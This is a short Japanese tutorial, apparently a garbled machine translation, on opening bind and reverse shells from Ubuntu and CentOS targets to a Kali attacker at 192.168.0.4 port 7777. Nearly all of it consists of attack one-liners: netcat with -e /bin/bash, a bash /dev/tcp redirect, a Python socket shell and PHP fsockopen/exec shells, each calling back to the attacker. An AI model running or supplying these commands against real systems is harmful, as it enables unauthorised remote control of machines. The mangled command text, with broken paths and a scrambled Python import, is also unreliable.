ターゲット・システムのためのUbuntuの場合は、CentOSのサーバー
カーリー攻撃者のシステムとして、IP:192.168.0.4、ポート7777を開き、空いています
最終的にはUbuntuのある、CentOSのは、シェルはカーリーまで回復しました
前方リバウンドシェル
Ubuntuのまたは入力上のCentOS
NC -lVP 7777 -e / binに/ bashの
カーリー入力
NCのIP 7777
前方リバウンドは、シェルを回復し、カリを監視するために、NC、NC指令を実行するターゲット・マシンです。
NCをインストールするには、ターゲットマシンのニーズ。
逆リバウンドシェル
方法1:bashのリバウンド
bashの-i>&は/ dev / TCP / IP /ポート0 >&1
しかし、最初にあなたはカーリーのポートをリスニングNC使用する必要があります。
NC -lVP 7777
Ubuntuのに成功リバウンドはありません。この方法では、CentOSのは、成功をバウンスすることができます。
方法2:pythonのリバウンド
次のようにシェルコマンドをリバウンド:
-cパイソン" S = socket.socket(はsocket.AF_INET、socket.SOCK_STREAM); s.connect(( 'IP'、ポート)); os.dup2(s.fileno()、0インポートOS、ソケット、サブプロセス); os.dup2(s.fileno()、1); os.dup2(s.fileno()、2); P = subprocess.call([ '/ binに/ bashの'、 ' - I']); "
まず、カーリーのポートをリスニングNC:
NC -lVP 7777
PythonのUbuntuのCentOSのまたは入力に逆接続を使用する場合には:
-cパイソン" S = socket.socket(はsocket.AF_INET、socket.SOCK_STREAM); s.connect(( '192.168.0.4'、7777)); os.dup2(s.fileno()インポートOS、ソケット、サブプロセス、0); os.dup2(s.fileno()、1); os.dup2(s.fileno()、2); P = subprocess.call([ '/ binに/ bashの'、 ' - I']) ;
このメソッドは、UbuntuとLinuxが成功リバウンドです。
方法3
カーリーに聞いてNCまず入力:
NC -lVP 7777
NC逆接続やCentOSののUbuntuのは、次のコマンドでを使用するには:
NC -e / binに/ bashの192.168。0.4 7777
方法4:PHPのシェルのリバウンド
カーリー入力で初:
NC -lVP 7777
そして、ターゲットマシン上で、次のコマンドを入力します。
php- ' のexec( "/ binに/ bashの-i>&/dev/tcp/192.168.0.4/7777")' 或 PHPの -r " $靴下= fsockopenの( "192.168.0.4"、7777);のexec(" /ビン/ bashの-i 0>&3 1>&3 2>&3" )。"
これらのメソッドの注意リバウンドPHPのシェルは、PHPのセーフモードを必要としますが、exec関数を使用する前に、このオプションをオフに。